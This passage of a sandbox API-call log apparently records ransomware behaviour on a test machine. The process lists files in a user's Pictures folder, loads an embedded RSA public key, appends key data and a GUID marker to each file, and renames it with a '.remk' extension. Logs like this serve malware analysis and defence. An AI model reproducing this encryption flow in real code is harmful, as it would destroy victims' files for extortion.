(hHash=0x31de170) returned 1 [0235.618] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.618] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.618] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.618] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.619] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4b0 | out: hHeap=0x630000) returned 1 [0235.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4f8 | out: hHeap=0x630000) returned 1 [0235.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc540 | out: hHeap=0x630000) returned 1 [0235.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc540 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc4f8 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc4b0 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4f8 | out: hHeap=0x630000) returned 1 [0235.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4b0 | out: hHeap=0x630000) returned 1 [0235.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc540 | out: hHeap=0x630000) returned 1 [0235.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.620] GetCurrentThreadId () returned 0x314 [0235.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c4b90 [0235.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0235.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.621] GetCurrentThreadId () returned 0x314 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc540 [0235.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc4b0 [0235.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0235.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc4f8 [0235.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc468 [0235.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc558 [0235.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc528 [0235.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc510 [0235.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc570 [0235.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc510 | out: hHeap=0x630000) returned 1 [0235.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc510 [0235.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc528 | out: hHeap=0x630000) returned 1 [0235.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0235.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4b0 | out: hHeap=0x630000) returned 1 [0235.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc4b0 [0235.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc540 | out: hHeap=0x630000) returned 1 [0235.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0235.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc570 | out: hHeap=0x630000) returned 1 [0235.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x319bc40 [0235.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4b0 | out: hHeap=0x630000) returned 1 [0235.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0235.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0235.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0235.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0235.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0235.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc510 | out: hHeap=0x630000) returned 1 [0235.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc558 | out: hHeap=0x630000) returned 1 [0235.625] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1762e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.625] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.626] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.626] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.626] CloseHandle (hObject=0x640) returned 1 [0235.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0235.628] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\Fh-vCljTYvw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fh-vcljtyvw.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\Fh-vCljTYvw.gif.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fh-vcljtyvw.gif.remk")) returned 1 [0235.630] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ca429b0, ftCreationTime.dwHighDateTime=0x1d5e022, ftLastAccessTime.dwLowDateTime=0xa8a6b670, ftLastAccessTime.dwHighDateTime=0x1d5dd39, ftLastWriteTime.dwLowDateTime=0xa8a6b670, ftLastWriteTime.dwHighDateTime=0x1d5dd39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FzGfdyB6", cAlternateFileName="")) returned 1 [0235.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0235.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185cc8 [0235.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185ef0 [0235.630] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d1c66a0, ftCreationTime.dwHighDateTime=0x1d5daa7, ftLastAccessTime.dwLowDateTime=0x76b72da0, ftLastAccessTime.dwHighDateTime=0x1d5d9b2, ftLastWriteTime.dwLowDateTime=0x76b72da0, ftLastWriteTime.dwHighDateTime=0x1d5d9b2, nFileSizeHigh=0x0, nFileSizeLow=0xb2fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hRaN7dOcX1AmD.gif", cAlternateFileName="HRAN7D~1.GIF")) returned 1 [0235.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x31a4298 [0235.630] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\hRaN7dOcX1AmD.gif") returned=".gif" [0235.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\hRaN7dOcX1AmD.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\hran7docx1amd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.631] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=45819) returned 1 [0235.631] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.634] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xb2d5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.634] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.636] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xb2fb, lpOverlapped=0x0) returned 1 [0235.637] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.637] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.637] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.637] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.638] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.638] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.638] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.638] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.638] GetLastError () returned 0x0 [0235.638] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.638] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.639] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.639] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.639] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.639] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.640] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xb2fb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.640] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.640] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.640] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.640] CloseHandle (hObject=0x640) returned 1 [0235.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0235.642] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\hRaN7dOcX1AmD.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\hran7docx1amd.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\hRaN7dOcX1AmD.gif.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\hran7docx1amd.gif.remk")) returned 1 [0235.644] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59df8150, ftCreationTime.dwHighDateTime=0x1d5e489, ftLastAccessTime.dwLowDateTime=0x4ad4520, ftLastAccessTime.dwHighDateTime=0x1d5db18, ftLastWriteTime.dwLowDateTime=0x4ad4520, ftLastWriteTime.dwHighDateTime=0x1d5db18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MJpyx6aDoSvpIH", cAlternateFileName="MJPYX6~1")) returned 1 [0235.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0235.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x37b1b88 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e730 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e8f8 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eac0 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ea28 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0235.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0235.645] RtlAllocateHeap 